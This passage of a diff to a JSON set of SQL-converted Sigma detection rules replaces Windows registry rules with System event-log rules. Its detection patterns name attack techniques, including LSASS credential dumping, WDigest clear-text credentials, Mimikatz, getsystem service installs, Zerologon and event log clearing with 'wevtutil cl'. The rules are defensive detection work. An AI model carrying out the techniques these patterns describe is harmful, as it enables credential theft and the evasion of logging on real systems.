"status": "test", - "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Important Windows Eventlog Cleared", + "id": "100ef69e-3327-481c-8e5c-6d80d9507556", + "status": "experimental", + "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. 
caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Unknown" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%WDigest\\\\UseLogonCredential' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog' AND Channel IN ('System', 'Security', 'Application'))" ], - "filename": "registry_set_wdigest_enable_uselogoncredential.yml" + "filename": "win_system_susp_eventlog_cleared.yml" }, { - "title": "VBScript Payload Stored in Registry", - "id": "46490193-1b22-4c29-bdd6-5bf63907216f", + "title": "Eventlog Cleared", + "id": "a62b37e0-45d3-48d9-a517-90c1a1b0186b", "status": "experimental", - "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", + "description": "One of the Windows Eventlogs has been cleared. e.g. 
caused by \"wevtutil cl\" command execution", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Unknown" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (NewValue LIKE '%vbscript:%' ESCAPE '\\' OR NewValue LIKE '%jscript:%' ESCAPE '\\' OR NewValue LIKE '%mshtml,%' ESCAPE '\\' OR NewValue LIKE '%RunHTMLApplication%' ESCAPE '\\' OR NewValue LIKE '%Execute(%' ESCAPE '\\' OR NewValue LIKE '%CreateObject%' ESCAPE '\\' OR NewValue LIKE '%window.close%' ESCAPE '\\')) AND NOT ((TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Installer\\\\UserData\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Microsoft.NET\\\\Primary Interop Assemblies\\\\Microsoft.mshtml.dll%' ESCAPE '\\' OR NewValue LIKE '%<\\\\Microsoft.mshtml,fileVersion=%' ESCAPE '\\' OR NewValue LIKE '%\\_mshtml\\_dll\\_%' ESCAPE '\\' OR NewValue LIKE '%<\\\\Microsoft.mshtml,culture=%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog') AND NOT (Channel IN ('System', 'Security', 'Application')))" ], - "filename": "registry_set_vbs_payload_stored.yml" + "filename": "win_system_eventlog_cleared.yml" }, { - "title": "Disable Microsoft Office Security Features", - "id": 
"7c637634-c95d-4bbf-b26c-a82510874b34", + "title": "DHCP Server Loaded the CallOut DLL", + "id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", "status": "test", - "description": "Disable Microsoft Office Security Features by registry", - "author": "frack113", + "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", + "author": "Dimitrios Slamaris", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%VBAWarnings' ESCAPE '\\' OR TargetObject LIKE '%DisableInternetFilesInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableUnsafeLocationsInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableAttachementsInPV' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '1033' AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" ], - "filename": "registry_set_disable_microsoft_office_security_features.yml" + "filename": "win_system_susp_dhcp_config.yml" }, { - "title": "Disable Security Events Logging Adding Reg Key MiniNt", - "id": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", + "title": "DHCP Server Error Failed Loading the CallOut DLL", + "id": "75edd3fd-7146-48e5-9848-3013d7f0282c", "status": "test", - "description": "Detects the addition of a key 'MiniNt' to the registry. 
Upon a reboot, Windows Event Log service will stopped write events.", - "author": "Ilyas Ochkov, oscd.community", + "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", + "author": "Dimitrios Slamaris, @atc_project (fix)", "tags": [ "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\' AND EventType = 'CreateKey') OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('1031', '1032', '1034') AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" ], - "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml" + "filename": "win_system_susp_dhcp_config_failed.yml" }, { - "title": "PrinterNightmare Mimimkatz Driver Name", - "id": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", + "title": "QuarksPwDump Clearing Access History", + "id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", "status": "test", - "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", - "author": "Markus Neis, @markus_neis, Florian Roth", + "description": "Detects QuarksPwDump clearing access history in hive", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204", - "cve.2021.1675", - "cve.2021.34527" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = 
'4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\QMS 810\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\mimikatz%' ESCAPE '\\') OR (TargetObject LIKE '%legitprinter%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentVersion\\\\Print\\\\Printers%' ESCAPE '\\') AND (TargetObject LIKE '%Gentil Kiwi%' ESCAPE '\\' OR TargetObject LIKE '%mimikatz printer%' ESCAPE '\\' OR TargetObject LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '16' AND Provider_Name = 'Microsoft-Windows-Kernel-General' AND HiveName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM%' ESCAPE '\\' AND HiveName LIKE '%.dmp' ESCAPE '\\')" ], - "filename": "registry_event_mimikatz_printernightmare.yml" + "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml" }, { - "title": "DLL Load via LSASS", - "id": "b3503044-60ce-4bf4-bbcb-e3db98788823", + "title": "Potential CVE-2021-42278 Exploitation Attempt", + "id": "44bbff3e-4ca3-452d-a49a-6efa4cafa06f", "status": "test", - "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", - "author": "Florian Roth (Nextron Systems)", + "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1547.008" + 
"attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\DirectoryServiceExtPt%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\LsaDbExtPt%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND (NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\' OR NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\lsadb.dll' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-Kerberos-Key-Distribution-Center' AND EventID IN ('35', '36', '37', '38'))" ], - "filename": "registry_event_susp_lsass_dll_load.yml" + "filename": "win_system_exploit_cve_2021_42278.yml" }, { - "title": "Run Once Task Configuration in Registry", - "id": "c74d7efc-8826-45d9-b8bb-f04fac9e4eff", + "title": "Potential CVE-2021-42287 Exploitation Attempt", + "id": "e80a0fee-1a62-4419-b31e-0d0db6e6013a", "status": "test", - "description": "Rule to detect the configuration of Run Once registry key. 
Configured payload can be run by runonce.exe /AlternateShellStartup", - "author": "Avneet Singh @v3t0_, oscd.community", + "description": "The attacker creates a computer object using those permissions with a password known to her.\nAfter that she clears the attribute ServicePrincipalName on the computer object.\nBecause she created the object (CREATOR OWNER), she gets granted additional permissions and can do many changes to the object.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.credential_access", + "attack.t1558.003" ], "falsepositives": [ - "Legitimate modification of the registry key by legitimate program" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' AND TargetObject LIKE '%\\\\StubPath' ESCAPE '\\') AND NOT ((NewValue LIKE '\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' AND NewValue LIKE '%\\\\Installer\\\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level%' ESCAPE '\\') OR ((NewValue LIKE '\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' OR NewValue LIKE '\"C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\') AND NewValue LIKE '%\\\\Installer\\\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-Directory-Services-SAM' AND EventID IN ('16990', '16991'))" ], - "filename": "registry_event_runonce_persistence.yml" + "filename": "win_system_exploit_cve_2021_42287.yml" }, { - "title": "Shell Open Registry Keys Manipulation", - "id": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", - "status": "test", - 
"description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Zerologon Exploitation Using Well-known Tools", + "id": "18f37338-b9bd-4117-a039-280c81f7a596", + "status": "stable", + "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", + "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1546.001" - ], - "falsepositives": [ - "Unknown" + "attack.t1210", + "attack.lateral_movement" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND NewValue LIKE '%\\\\Software\\\\Classes\\\\{%' ESCAPE '\\') OR TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR ((EventType = 'SetValue' AND (TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\exefile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('5805', '5723') AND (logs MATCH ('\"kali\" OR \"mimikatz\"')))" ], - "filename": "registry_event_shell_open_keys_manipulation.yml" + "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" }, { - "title": "New DLL Added to 
AppInit_DLLs Registry Key", - "id": "4f84b697-c9ed-4420-8ab5-e09af5b2345d", + "title": "Vulnerable Netlogon Secure Channel Connection Allowed", + "id": "a0cb7110-edf0-47a4-9177-541a4083128a", "status": "test", - "description": "DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll", - "author": "Ilyas Ochkov, oscd.community, Tim Shelton", + "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", + "author": "NVISO", "tags": [ - "attack.persistence", - "attack.t1546.010" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\') OR (NewName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\' OR NewName LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'NetLogon' AND EventID = '5829')" ], - "filename": "registry_event_new_dll_added_to_appinit_dlls_registry_key.yml" + "filename": "win_system_vul_cve_2020_1472.yml" }, { - "title": "Atbroker Registry Change", - "id": "9577edbb-851f-4243-8c91-1d5b50c1a39b", + "title": "KDC RC4-HMAC Downgrade CVE-2022-37966", + "id": "e6f81941-b1cd-4766-87db-9fc156f658ee", "status": 
"experimental", - "description": "Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'", - "author": "Mateusz Wydra, oscd.community", + "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.persistence", - "attack.t1547" + "attack.privilege_escalation" ], "falsepositives": [ - "Creation of non-default, legitimate at usage" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\ATs%' ESCAPE '\\' OR TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\Configuration%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\atbroker.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\Configuration%' ESCAPE '\\' AND NewValue = '(Empty)') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\ATs%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '42' AND Provider_Name = 'Kerberos-Key-Distribution-Center' AND Level = '2')" ], - "filename": "registry_event_susp_atbroker_change.yml" + "filename": "win_system_kdcsvc_rc4_downgrade.yml" }, { - "title": "PortProxy Registry Key", - "id": "a54f842a-3713-4b45-8c84-5f136fdebd3c", + "title": "NTFS Vulnerability Exploitation", + "id": "f14719ce-d3ab-4e25-9ce6-2899092260b0", "status": "test", - "description": "Detects the modification of 
PortProxy registry key which is used for port forwarding. For command execution see rule win_netsh_port_fwd.yml.", - "author": "Andreas Hunkeler (@Karneades)", + "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" + "attack.impact", + "attack.t1499.001" ], "falsepositives": [ - "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)", - "Synergy Software KVM (https://symless.com/synergy)" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\PortProxy\\\\v4tov4\\\\tcp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Ntfs' AND EventID = '55' AND Origin = 'File System Driver' AND Description LIKE '%contains a corrupted file record%' ESCAPE '\\' AND Description LIKE '%The name of the file is \"\\\\\"%' ESCAPE '\\')" ], - "filename": "registry_event_portproxy_registry_key.yml" + "filename": "win_system_ntfs_vuln_exploit.yml" }, { - "title": "Creation of a Local Hidden User Account by Registry", - "id": "460479f3-80b7-42da-9c43-2cc1d54dbccd", + "title": "Local Privilege Escalation Indicator TabTip", + "id": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", "status": "experimental", - "description": "Sysmon registry detection of a local hidden user account.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", + "author": "Florian Roth (Nextron Systems)", "tags": [ - 
"attack.persistence", - "attack.t1136.001" + "attack.execution", + "attack.t1557.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\%' ESCAPE '\\' AND TargetObject LIKE '%$' ESCAPE '\\' AND NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-DistributedCOM' AND EventID = '10001' AND param1 LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ink\\\\TabTip.exe' ESCAPE '\\' AND param2 = '2147943140' AND param3 = '{054AAE20-4BEA-4347-8A35-64A533254A9D}')" ], - "filename": "registry_event_add_local_hidden_user.yml" + "filename": "win_system_lpe_indicators_tabtip.yml" }, { - "title": "OilRig APT Registry Persistence", - "id": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", - "status": "test", - "description": "Detects OilRig registry persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "title": "Service Installed By Unusual Client - System", + "id": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", + "status": "experimental", + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "author": "Tim Rauch", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 
'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UMe' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UT' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ProcessId = '0')" ], - "filename": "registry_event_apt_oilrig_mar18.yml" + "filename": "win_system_system_service_installation_by_unusal_client.yml" }, { - "title": "Potential Credential Dumping Via LSASS SilentProcessExit Technique", - "id": "55e29995-75e7-451a-bef0-6225e2f13597", + "title": "Moriya Rootkit - System", + "id": "25b9c01c-350d-4b95-bed1-836d04a4f324", "status": "experimental", - "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "author": "Bhabesh Raj", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\lsass.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'ZzNetSvc')" ], - "filename": "registry_event_silentprocessexit_lsass.yml" + "filename": "win_system_moriya_rootkit.yml" }, { - "title": "Windows Credential Editor Registry", - "id": "a6b33c02-8305-488f-8585-03cb2a7763f2", - "status": "test", - "description": "Detects the 
use of Windows Credential Editor (WCE)", - "author": "Florian Roth (Nextron Systems)", + "title": "Service Installation in Suspicious Folder", + "id": "5e993621-67d4-488a-b9ae-b420d08b96cb", + "status": "experimental", + "description": "Detects service installation in suspicious folder appdata", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Services\\\\WCESERVICE\\\\Start%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\127.0.0.1%' ESCAPE '\\' OR ImagePath LIKE '%\\\\\\\\localhost%' ESCAPE '\\')) AND NOT ((ServiceName = 'Zoom Sharing Service' AND ImagePath LIKE '\"C:\\\\Program Files\\\\Common Files\\\\Zoom\\\\Support\\\\CptService.exe%' ESCAPE '\\')))" ], - "filename": "registry_event_hack_wce_reg.yml" + "filename": "win_system_susp_service_installation_folder.yml" }, { - "title": "New DLL Added to AppCertDlls Registry Key", - "id": "6aa1d992-5925-4e9f-a49b-845e51d1de01", - "status": "test", - "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation\nby causing a malicious DLL to be loaded and run in the context of separate processes on the computer.\n", - "author": "Ilyas Ochkov, oscd.community", + "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", + "id": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", + "status": "experimental", + 
"description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.persistence", - "attack.t1546.009" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Unknown" + "Highly unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\AppCertDlls' ESCAPE '\\' OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurentControlSet\\\\Control\\\\Session Manager\\\\AppCertDlls' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%cmd.exe%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%.dll,a%' ESCAPE '\\' AND ImagePath LIKE '%/p:%' ESCAPE '\\') OR ImagePath LIKE '\\\\\\\\127.0.0.1\\\\ADMIN$\\\\%' ESCAPE '\\'))" ], - "filename": "registry_event_new_dll_added_to_appcertdlls_registry_key.yml" + "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" }, { - "title": "Suspicious Camera and Microphone Access", - "id": "62120148-6b7a-42be-8b91-271c04e281a3", - "status": "test", - "description": "Detects Processes accessing the camera and 
microphone from suspicious folder", - "author": "Den Iuzvyk", + "title": "Invoke-Obfuscation STDIN+ Launcher - System", + "id": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.collection", - "attack.t1125", - "attack.t1123" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NonPackaged%' ESCAPE '\\' AND (TargetObject LIKE '%microphone%' ESCAPE '\\' OR TargetObject LIKE '%webcam%' ESCAPE '\\') AND (TargetObject LIKE '%:#Windows#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#$Recycle.bin#%' ESCAPE '\\' OR TargetObject LIKE '%:#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Public#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Default#%' ESCAPE '\\' OR TargetObject LIKE 